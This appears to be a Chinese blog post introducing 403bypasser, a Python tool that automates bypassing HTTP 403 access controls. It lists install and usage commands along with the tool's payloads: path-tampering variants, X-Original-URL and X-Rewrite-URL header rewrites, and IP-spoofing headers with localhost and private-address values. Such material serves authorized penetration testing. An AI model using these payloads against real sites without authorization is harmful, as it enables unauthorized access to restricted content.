如何使用403bypasser绕过目标页面上的访问控制限制

403bypasser是一个用Python编写的工具,用于自动化绕过目标页面的403访问控制限制。它支持GET到POST请求转换、路径篡改和利用非标准Header重写URL。用户可以通过指定单个URL、URL列表、目录或目录列表进行扫描。此外,还提供了详细的学习成长路线图资源。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

关于403bypasser

403bypasser是一款自动化工具,该工具能够以自动化的形式实现针对目标页面的访问控制限制绕过技术。403bypasser项目目前仍处于积极开发阶段,并且还会增加新的功能。

该工具基于Python语言开发,因此具备良好的跨平台特性。

工具安装

首先,我们需要使用下列命令将该项目源码克隆至本地:

git clone https://github.com/yunemse48/403bypasser.git

接下来,运行下列命令安装好该工具所需的依赖模块:

pip install -r requirements.txt

此时,403bypasser已完成安装。

工具参数

** 参数**

|

** 描述**

|

** 样例**

|

** Note**

—|—|—|—

-u

|

single URL to scan

|

http://example.comor http://example.com/

|

指定目标页面的URL地址

-U

|

path to list of URLs

|

./urllist.txt, …/…/urllist.txt等等

|

指定目标页面URL列表文件的地址

-d

|

single directory to scan

|

Admin 或/admin 或admin/ 或/admin/

|

指定需要扫描的目标目录

-D

|

path to list of directories

|

./dirlist.txt, …/…/dirlist.txt等等

|

指定需要扫描的目标目录列表文件

工具使用

使用样例1

python3 403bypasser.py -u https://example.com -d /secret

使用样例2

python3 403bypasser.py -u https://example.com -D dirlist.txt

使用样例3

python3 403bypasser.py -U urllist.txt -d /secret

使用样例4

python3 403bypasser.py -U urllist.txt -D dirlist.txt

注意事项:下面给出的例子中,不同斜杠使用的结果都是一样的,你可以选择自己喜欢的方式:

python3 403bypasser.py -u https://example.com -d secret

python3 403bypasser.py -u https://example.com -d /secret

python3 403bypasser.py -u https://example.com -d /secret/

python3 403bypasser.py -u https://example.com -d secret/

python3 403bypasser.py -u https://example.com/ -d secret

该工具支持的功能

请求方法篡改

将GET请求转换为POST请求

路径篡改

/%2e/secret

/secret/

/secret..;/

/secret/..;/

/secret%20

/secret%09

/secret%00

/secret.json

/secret.css

/secret.html

/secret?

/secret??

/secret???

/secret?testparam

/secret#

/secret#test

/secret/.

//secret//

/./secret/./

通过非标准Header重写目标URL

X-Original-URL: /secret

X-Rewrite-URL: /secret

其他Header&值

Header:

X-Custom-IP-Authorization

X-Forwarded-For

X-Forward-For

X-Remote-IP

X-Originating-IP

X-Remote-Addr

X-Client-IP

X-Real-IP

值:

localhost

localhost:80

localhost:443

127.0.0.1

127.0.0.1:80

127.0.0.1:443

2130706433

0x7F000001

0177.0000.0000.0001

0

127.1

10.0.0.0

10.0.0.1

172.16.0.0

172.16.0.1

192.168.1.0

192.168.1.1

工具运行截图

最后

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【扫下方二维码】免费领取:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值